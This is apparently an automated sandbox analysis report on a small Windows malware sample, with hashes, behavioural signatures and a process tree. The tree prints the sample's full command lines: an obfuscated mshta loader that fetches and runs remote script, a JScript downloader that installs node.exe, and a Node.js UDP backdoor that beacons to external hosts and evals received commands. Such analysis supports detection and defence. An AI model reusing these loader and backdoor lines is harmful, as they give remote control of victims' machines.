Analysis
-
max time kernel
152s -
max time network
152s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
20-07-2021 08:09
Static task
static1
Behavioral task
behavioral1
Sample
usfive_20210720-060205(1).exe
Resource
win7v20210410
General
-
Target
usfive_20210720-060205(1).exe
-
Size
3KB
-
MD5
463127c9a2b5eb1bca799aced10e4954
-
SHA1
df78c1cca98d6f260f744a2b0639e1fff1c11a5e
-
SHA256
863c612734f5ff0ff0ea3fed7fd790dfb43c47eecdc1417bcd82c0ad866419af
-
SHA512
86c01a90941ad53e7d5c77b64c249bb0b4a69d9cc0f3e3971813464312a80ef6b06caef24cec9e9e194a25f0e667eafb445acbe9ce220830e4681312b498d9a4
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
Processes:
mshta.execscript.exeflow pid process 12 3128 mshta.exe 13 2752 cscript.exe -
Executes dropped EXE 1 IoCs
Processes:
node.exepid process 1016 node.exe -
Modifies file permissions 1 TTPs 1 IoCs
-
Drops file in Windows directory 2 IoCs
Processes:
expand.exedescription ioc process File opened for modification C:\Windows\Logs\DPX\setupact.log expand.exe File opened for modification C:\Windows\Logs\DPX\setuperr.log expand.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
node.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString node.exe -
Enumerates processes with tasklist 1 TTPs 1 IoCs
-
Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.
Processes:
ipconfig.exenetstat.exepid process 1256 ipconfig.exe 3052 netstat.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
NTFS ADS 2 IoCs
Processes:
node.exedescription ioc process File created C:\Users\Admin\AppData\Local\Temp\476b392368cefbf4:ads node.exe File created C:\ProgramData\DNTException\node.exe:4672ebd37f9e76637f375dcd7c701bb9 node.exe -
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 12 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 13 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
node.exepid process 1016 node.exe 1016 node.exe 1016 node.exe 1016 node.exe -
Suspicious use of AdjustPrivilegeToken 44 IoCs
Processes:
tasklist.exewmic.exenetstat.exedescription pid process Token: SeDebugPrivilege 640 tasklist.exe Token: SeIncreaseQuotaPrivilege 3976 wmic.exe Token: SeSecurityPrivilege 3976 wmic.exe Token: SeTakeOwnershipPrivilege 3976 wmic.exe Token: SeLoadDriverPrivilege 3976 wmic.exe Token: SeSystemProfilePrivilege 3976 wmic.exe Token: SeSystemtimePrivilege 3976 wmic.exe Token: SeProfSingleProcessPrivilege 3976 wmic.exe Token: SeIncBasePriorityPrivilege 3976 wmic.exe Token: SeCreatePagefilePrivilege 3976 wmic.exe Token: SeBackupPrivilege 3976 wmic.exe Token: SeRestorePrivilege 3976 wmic.exe Token: SeShutdownPrivilege 3976 wmic.exe Token: SeDebugPrivilege 3976 wmic.exe Token: SeSystemEnvironmentPrivilege 3976 wmic.exe Token: SeRemoteShutdownPrivilege 3976 wmic.exe Token: SeUndockPrivilege 3976 wmic.exe Token: SeManageVolumePrivilege 3976 wmic.exe Token: 33 3976 wmic.exe Token: 34 3976 wmic.exe Token: 35 3976 wmic.exe Token: 36 3976 wmic.exe Token: SeIncreaseQuotaPrivilege 3976 wmic.exe Token: SeSecurityPrivilege 3976 wmic.exe Token: SeTakeOwnershipPrivilege 3976 wmic.exe Token: SeLoadDriverPrivilege 3976 wmic.exe Token: SeSystemProfilePrivilege 3976 wmic.exe Token: SeSystemtimePrivilege 3976 wmic.exe Token: SeProfSingleProcessPrivilege 3976 wmic.exe Token: SeIncBasePriorityPrivilege 3976 wmic.exe Token: SeCreatePagefilePrivilege 3976 wmic.exe Token: SeBackupPrivilege 3976 wmic.exe Token: SeRestorePrivilege 3976 wmic.exe Token: SeShutdownPrivilege 3976 wmic.exe Token: SeDebugPrivilege 3976 wmic.exe Token: SeSystemEnvironmentPrivilege 3976 wmic.exe Token: SeRemoteShutdownPrivilege 3976 wmic.exe Token: SeUndockPrivilege 3976 wmic.exe Token: SeManageVolumePrivilege 3976 wmic.exe Token: 33 3976 wmic.exe Token: 34 3976 wmic.exe Token: 35 3976 wmic.exe Token: 36 3976 wmic.exe Token: SeDebugPrivilege 3052 netstat.exe -
Suspicious use of WriteProcessMemory 51 IoCs
Processes:
usfive_20210720-060205(1).exemshta.execmd.execscript.exenode.exedescription pid process target process PID 396 wrote to memory of 3128 396 usfive_20210720-060205(1).exe mshta.exe PID 396 wrote to memory of 3128 396 usfive_20210720-060205(1).exe mshta.exe PID 396 wrote to memory of 3128 396 usfive_20210720-060205(1).exe mshta.exe PID 3128 wrote to memory of 868 3128 mshta.exe cmd.exe PID 3128 wrote to memory of 868 3128 mshta.exe cmd.exe PID 3128 wrote to memory of 868 3128 mshta.exe cmd.exe PID 868 wrote to memory of 2752 868 cmd.exe cscript.exe PID 868 wrote to memory of 2752 868 cmd.exe cscript.exe PID 868 wrote to memory of 2752 868 cmd.exe cscript.exe PID 868 wrote to memory of 1316 868 cmd.exe expand.exe PID 868 wrote to memory of 1316 868 cmd.exe expand.exe PID 868 wrote to memory of 1316 868 cmd.exe expand.exe PID 868 wrote to memory of 3772 868 cmd.exe cscript.exe PID 868 wrote to memory of 3772 868 cmd.exe cscript.exe PID 868 wrote to memory of 3772 868 cmd.exe cscript.exe PID 3772 wrote to memory of 1016 3772 cscript.exe node.exe PID 3772 wrote to memory of 1016 3772 cscript.exe node.exe PID 3772 wrote to memory of 1016 3772 cscript.exe node.exe PID 1016 wrote to memory of 4052 1016 node.exe cmd.exe PID 1016 wrote to memory of 4052 1016 node.exe cmd.exe PID 1016 wrote to memory of 4052 1016 node.exe cmd.exe PID 1016 wrote to memory of 3332 1016 node.exe cacls.exe PID 1016 wrote to memory of 3332 1016 node.exe cacls.exe PID 1016 wrote to memory of 3332 1016 node.exe cacls.exe PID 1016 wrote to memory of 3196 1016 node.exe icacls.exe PID 1016 wrote to memory of 3196 1016 node.exe icacls.exe PID 1016 wrote to memory of 3196 1016 node.exe icacls.exe PID 1016 wrote to memory of 3200 1016 node.exe attrib.exe PID 1016 wrote to memory of 3200 1016 node.exe attrib.exe PID 1016 wrote to memory of 3200 1016 node.exe attrib.exe PID 1016 wrote to memory of 2584 1016 node.exe attrib.exe PID 1016 wrote to memory of 2584 1016 node.exe attrib.exe PID 1016 wrote to memory of 2584 1016 node.exe attrib.exe PID 1016 wrote to memory of 640 1016 node.exe tasklist.exe PID 1016 wrote to memory of 640 1016 node.exe tasklist.exe PID 1016 wrote to memory of 640 1016 node.exe tasklist.exe PID 1016 wrote to memory of 3976 1016 node.exe wmic.exe PID 1016 wrote to memory of 3976 1016 node.exe wmic.exe PID 1016 wrote to memory of 3976 1016 node.exe wmic.exe PID 1016 wrote to memory of 1256 1016 node.exe ipconfig.exe PID 1016 wrote to memory of 1256 1016 node.exe ipconfig.exe PID 1016 wrote to memory of 1256 1016 node.exe ipconfig.exe PID 1016 wrote to memory of 208 1016 node.exe route.exe PID 1016 wrote to memory of 208 1016 node.exe route.exe PID 1016 wrote to memory of 208 1016 node.exe route.exe PID 1016 wrote to memory of 3052 1016 node.exe netstat.exe PID 1016 wrote to memory of 3052 1016 node.exe netstat.exe PID 1016 wrote to memory of 3052 1016 node.exe netstat.exe PID 1016 wrote to memory of 1576 1016 node.exe systeminfo.exe PID 1016 wrote to memory of 1576 1016 node.exe systeminfo.exe PID 1016 wrote to memory of 1576 1016 node.exe systeminfo.exe -
Views/modifies file attributes 1 TTPs 2 IoCs
Processes:
attrib.exeattrib.exepid process 3200 attrib.exe 2584 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\usfive_20210720-060205(1).exe"C:\Users\Admin\AppData\Local\Temp\usfive_20210720-060205(1).exe"1⤵
- Suspicious use of WriteProcessMemory
PID:396 -
C:\Windows\SysWOW64\mshta.exemshta "javascript:document.write();0;y=unescape('%318%36%7E%68t%74p%3A%2F%2Fa%73u%302%2Es%68o%70%2F%68r%69%2F%3F2%31a%36e%34b%7E1%304').split('~');182;try{x='WinHttp';5;x=new ActiveXObject(x+'.'+x+'Request.5.1');141;x.open('GET',y[1]+'&a='+escape(window.navigator.userAgent),!1);238;x.send();115;y='ipt.S';143;new ActiveXObject('WScr'+y+'hell').Run(unescape(unescape(x.responseText)),0,!2);27;}catch(e){};167;;window.close();"2⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:3128 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /d/s/c cd /d "C:\ProgramData" & mkdir "DNTException" & cd "DNTException" & dir /a node.exe || ( echo x=new ActiveXObject("WinHttp.WinHttpRequest.5.1"^);x.Open("GET",unescape(WScript.Arguments(0^)^),false^);x.Send(^);b=new ActiveXObject("ADODB.Stream"^);b.Type=1;b.Open(^);b.Write(x.ResponseBody^);b.SaveToFile(WScript.Arguments(1^),2^); > get1626768640845.txt & cscript /nologo /e:jscript get1626768640845.txt "http%3A%2F%2Fasu02.shop%2Fhri%2F%3F2f0098db7%26b%3Daa2c1c33" node.cab & expand node.cab node.exe & del get1626768640845.txt node.cab ) & echo new ActiveXObject("WScript.Shell").Run(WScript.Arguments(0),0,false); > get1626768640845.txt & cscript /nologo /e:jscript get1626768640845.txt "node -e eval(unescape('s=require(%27dgram%27).createSocket(%27udp4%27);s.on(%27error%27,function(e){});s.i=%27f0098db7%27;function%20f(b){if(!b)b=new%20Buffer(%27p%27);s.send(b,0,b.length,19584,%27asu00.xyz%27);s.send(b,0,b.length,19584,%27lu0.viewdns.net%27)};f();s.t=setInterval(f,10000);s.on(%27message%27,function(m,r){try{if(!m[0])return%20s.c(m.slice(1),r);for(var%20a=1;a<m.length;a++)m[a]^=a^m[0]^134;m[0]=32;eval(m.toString())}catch(e){}})'))" & del get1626768640845.txt3⤵
- Suspicious use of WriteProcessMemory
PID:868 -
C:\Windows\SysWOW64\cscript.execscript /nologo /e:jscript get1626768640845.txt "http%3A%2F%2Fasu02.shop%2Fhri%2F%3F2f0098db7%26b%3Daa2c1c33" node.cab4⤵
- Blocklisted process makes network request
PID:2752 -
C:\Windows\SysWOW64\expand.exeexpand node.cab node.exe4⤵
- Drops file in Windows directory
PID:1316 -
C:\Windows\SysWOW64\cscript.execscript /nologo /e:jscript get1626768640845.txt "node -e eval(unescape('s=require(%27dgram%27).createSocket(%27udp4%27);s.on(%27error%27,function(e){});s.i=%27f0098db7%27;function%20f(b){if(!b)b=new%20Buffer(%27p%27);s.send(b,0,b.length,19584,%27asu00.xyz%27);s.send(b,0,b.length,19584,%27lu0.viewdns.net%27)};f();s.t=setInterval(f,10000);s.on(%27message%27,function(m,r){try{if(!m[0])return%20s.c(m.slice(1),r);for(var%20a=1;a<m.length;a++)m[a]^=a^m[0]^134;m[0]=32;eval(m.toString())}catch(e){}})'))"4⤵
- Suspicious use of WriteProcessMemory
PID:3772 -
C:\ProgramData\DNTException\node.exe"C:\ProgramData\DNTException\node.exe" -e eval(unescape('s=require(%27dgram%27).createSocket(%27udp4%27);s.on(%27error%27,function(e){});s.i=%27f0098db7%27;function%20f(b){if(!b)b=new%20Buffer(%27p%27);s.send(b,0,b.length,19584,%27asu00.xyz%27);s.send(b,0,b.length,19584,%27lu0.viewdns.net%27)};f();s.t=setInterval(f,10000);s.on(%27message%27,function(m,r){try{if(!m[0])return%20s.c(m.slice(1),r);for(var%20a=1;a<m.length;a++)m[a]^=a^m[0]^134;m[0]=32;eval(m.toString())}catch(e){}})'))5⤵
- Executes dropped EXE
- Checks processor information in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1016 -
C:\Windows\SysWOW64\cmd.execmd.exe /c dir C:\6⤵PID:4052
-
C:\Windows\SysWOW64\cacls.execacls.exe C:\ProgramData\DNTException /t /e /c /g Everyone:F6⤵PID:3332
-
C:\Windows\SysWOW64\icacls.exeicacls.exe C:\ProgramData\DNTException /t /c /grant *S-1-1-0:(f)6⤵
- Modifies file permissions
PID:3196 -
C:\Windows\SysWOW64\attrib.exeattrib.exe +H C:\ProgramData\DNTException6⤵
- Views/modifies file attributes
PID:3200 -
C:\Windows\SysWOW64\attrib.exeattrib.exe +H C:\ProgramData\DNTException\node.exe6⤵
- Views/modifies file attributes
PID:2584 -
C:\Windows\SysWOW64\tasklist.exetasklist /fo csv /nh6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:640 -
C:\Windows\SysWOW64\Wbem\wmic.exewmic process get processid,parentprocessid,name,executablepath /format:csv6⤵
- Suspicious use of AdjustPrivilegeToken
PID:3976 -
C:\Windows\SysWOW64\ipconfig.exeipconfig.exe /all6⤵
- Gathers network information
PID:1256 -
C:\Windows\SysWOW64\route.exeroute.exe print6⤵PID:208
-
C:\Windows\SysWOW64\netstat.exenetstat.exe -ano6⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
PID:3052 -
C:\Windows\SysWOW64\systeminfo.exesysteminfo.exe /fo csv6⤵
- Gathers system information
PID:1576
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
52ec5ebd8a447b5115ce83e703bcde51
SHA138ce97f87c6be668d07985558fc89c53e27770a3
SHA256ef1be6a77e480e683331052654d3db47a02fe4b7af3e35e67b9248e989307615
SHA5129af71d426564ef92ff6de1d89107161c138bbdd9dc08b5e380a0b94e7b2e91ec4d498a1d8f4514552a45bf14a8f9078dc295aa1cb86cfc063427ad218e9d5f32
-
MD5
e15f82747d0884d61a5bc4fb2db7d29d
SHA1aca478622586f17603fe56705fd319b75198b2b0
SHA256982675d0465497986b3ece89f08f81a4629d975617671153e0ca653f2589966f
SHA512d8c17e54cbefa72191c238f23d619a4637fd74c8c8b9975071bf5507c5a34259495cd20e516c7f7f0c215ec4f724b22de88b8a5ea43765c019eb067600cf661d
-
MD5
c7ed3d9304a29c8b472174bd910be071
SHA122b7d55b80acd434c13b0a2d8c59b45c10220a42
SHA256abbaffb1b56bd3c5db5aedf4bdc0794d82bedba43677d13cd1056cb5412b3441
SHA512c65c80564019ae54145a939f9ed463895c337f020cbd769647dc6baf8db5db283a5e151c2ae4f10681d23db161d791ce59c395d8ebba603a27a2a6be0368a1a2
-
MD5
11f0b4e17e686cdc46f85a6becede4a8
SHA12826f7ac33b43439ecddd08ad541a7f54a9eb7c0
SHA2566a6ce9cbc42560a1d0ed9c04dcdcb84127f0c2e90d4850fd0e3003b31549795c
SHA51211a321cc6685f854544a5228ae27cf311cf7ccc534be5255b4a6e6976c3d3c6ebe9d0873f8af0ad409d7893ea616754ebbf917e561d84bc22e81e030af4d084f
-
MD5
11f0b4e17e686cdc46f85a6becede4a8
SHA12826f7ac33b43439ecddd08ad541a7f54a9eb7c0
SHA2566a6ce9cbc42560a1d0ed9c04dcdcb84127f0c2e90d4850fd0e3003b31549795c
SHA51211a321cc6685f854544a5228ae27cf311cf7ccc534be5255b4a6e6976c3d3c6ebe9d0873f8af0ad409d7893ea616754ebbf917e561d84bc22e81e030af4d084f